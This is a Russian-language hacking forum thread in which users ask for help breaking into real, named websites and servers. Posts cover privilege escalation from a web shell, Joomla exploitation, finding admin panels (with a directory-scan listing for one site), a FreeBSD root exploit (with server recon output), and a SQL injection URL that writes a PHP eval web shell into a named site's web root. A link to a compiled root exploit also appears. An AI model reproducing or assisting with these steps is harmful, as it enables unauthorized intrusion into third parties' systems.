Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    есть шелл на сайте,как поднять права на ос WindowsNT U6 0 6 x86?
     
  2. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Добрый вечер.
    Нашел сайт (elnino.ru) со следующей версией движка:
    Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно...
    Не могли бы вы помочь/разъяснить, что делаю не так?!
     
  3. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    В ядре джумлы мало уязвимостей, смотри на компоненты которые есть на сайте.
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    мало ли что делаешь, не факт что уязвимости есть на том сайте, может баги прикрыли или версия цмс=ки обновленная..так что сам подумай если багу выложили в паблик, как долго она проживет?...вот именно..правильно подумал..
     
  5. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ты посмотрел 1-м способом
    это далеко не неопределенная версия лучше уточни первым способом...
     
  6. dimm666

    dimm666 New Member

    Joined:
    29 Mar 2010
    Messages:
    16
    Likes Received:
    2
    Reputations:
    5
    Здравствуйте. Подскажите, плз, такую вещь - имеется доступ в админку сайта на HostCMS. Можно ли этим воспользоваться и слить весь сайт целиком?
     
  7. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Нигде больше, кроме просмотра страниц с фотками в галерее, переменных, которые принимают параметры, нет...
    Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)

    Ну так поудаляй все оттуда...
     
  8. dimm666

    dimm666 New Member

    Joined:
    29 Mar 2010
    Messages:
    16
    Likes Received:
    2
    Reputations:
    5
    Нееее, =)))) , надо именно слить его целиком себе, т.е. получить полную его копию.
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    попробуй залить шелл..а там уже и ежу понятно что делатЬ
     
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    помогите найти админу=)
    heimlichinstitute.com
     
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    2 Iggy
    Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)

    ну это понятно,ты выяснил что джумла 1.5.x

    но это еще не все, тебе надо теперь выяснить бета это или какой версии релиз?
    но неполучится у тебя это зделать нету необходимых файлов чтобы посмотреть версию
    да и параметров которые я указывал,у тебя они вообще отсутствуют на сайте,так что...

    1.5.0 Release Candidate 3

    * @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $

    1.5.0 Release Candidate 2

    * @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $

    1.5.0 Release Candidate 1

    * @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $

    1.5.0 Beta 2

    * @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $

    1.5.0 Beta

    * @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $
     
    #13871 547, 29 Jun 2010
    Last edited: 29 Jun 2010
  12. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://brahmos.com
    гдэ собстнэ админка?
    спс.
     
  13. .:GOGA:.

    .:GOGA:. Member

    Joined:
    28 Jun 2010
    Messages:
    93
    Likes Received:
    9
    Reputations:
    5
    попробуй http://brahmos.com/ControlPanel/
     
    1 person likes this.
  14. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Благодарю.
    Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует почему именно нет/да)
    Разверни ответ, если не сложно...
     
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    не подскажу,потому как не пробовал брутить админки...
     
  16. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    Подскажите root сплойт на:
    FreeBSD *.com 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Wed May 27 04:46:55 MSD 2009 root@:/usr/obj/usr/src/sys/ISPSYSTEM amd64

    Server software: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2
    Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authn_dbm, mod_authn_anon, mod_authn_default, mod_authn_alias, mod_authz_host, mod_authz_groupfile, mod_authz_user, mod_authz_dbm, mod_authz_owner, mod_authz_default, mod_auth_basic, mod_auth_digest, mod_file_cache, mod_cache, mod_disk_cache, mod_dumpio, mod_reqtimeout, mod_include, mod_filter, mod_charset_lite, mod_deflate, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_setenvif, mod_version, mod_proxy, mod_proxy_http, mod_ssl, mod_mime, mod_dav, mod_status, mod_autoindex, mod_asis, mod_info, mod_suexec, mod_cgi, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_imagemap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_ispmgr
    Disabled PHP Functions: none
    Open base dir: /home/vice/data:.
    cURL support: no
    Supported databases: MySql (5.1.47)

    Readable /etc/passwd: no
    Readable /etc/shadow: no

    Userful: gcc, cc, ld, make, perl, tar, gzip, bzip2, nc, locate
    Danger: ipfw
    Downloaders: fetch
     
    #13876 IMMORTAL_S, 29 Jun 2010
    Last edited: 29 Jun 2010
    1 person likes this.
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Поищи тут админку!

    » http://brahmos.com/.htaccess HTTP 403 Forbidden
    » http://brahmos.com/.htconfig HTTP 403 Forbidden
    » http://brahmos.com/.htpasswd HTTP 403 Forbidden
    » http://brahmos.com/archive/ HTTP 200 OK
    » http://brahmos.com/backoffice/ HTTP 200 OK
    » http://brahmos.com/cgi-bin/ HTTP 401 Authorization Required
    » http://brahmos.com/ControlPanel/ HTTP 200 OK
    » http://brahmos.com/config/ HTTP 200 OK
    » http://brahmos.com/download/ HTTP 200 OK
    » http://brahmos.com/downloads/ HTTP 302 Found
    » http://brahmos.com/error/ HTTP 403 Forbidden
    » http://brahmos.com/gallery/ HTTP 200 OK
    » http://brahmos.com/images/ HTTP 200 OK
    » http://brahmos.com/login/ HTTP 200 OK
    » http://brahmos.com/style/ HTTP 200 OK
    » http://brahmos.com/test/ HTTP 200 OK
    » http://brahmos.com/content/ HTTP 200 OK
    » http://brahmos.com/favicon.ico HTTP 200 OK
    » http://brahmos.com/icons/ HTTP 200 OK
    » http://brahmos.com/index.html HTTP 200 OK
    » http://brahmos.com/log/ HTTP 200 OK
    » http://brahmos.com/login.php HTTP 200 OK
    » http://brahmos.com/manual/ HTTP 200 OK
    » http://brahmos.com/sitemap.html HTTP 200 OK
    » http://brahmos.com/test.php HTTP 200 OK
    » http://brahmos.com/webmail/ HTTP 302 Found
     
  18. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    2IMMORTAL_S
    Попробуй https://forum.antichat.ru/threadnav160377-1-10.html
     
  19. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    to wkar: сп, я пробовал уже его... что-то не сработал.
    Пакет не сработал.. делал в ручную.. program.c нормально скомпилился, а вот env.c при компиляции выдал ошибки(какие точно не помню), но файл откомпиленный появился.
    Народ, что посоветуете?
     
  20. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1 
    запрос:
    PHP:
    http://www.buddhatour.ru/new/?link=1+union+select+'<?php eval($_GET[v]);?>'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'
    Подскажите, где ошибка?


    ПС
    Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/
     
    1 person likes this.
Thread Status:
Not open for further replies.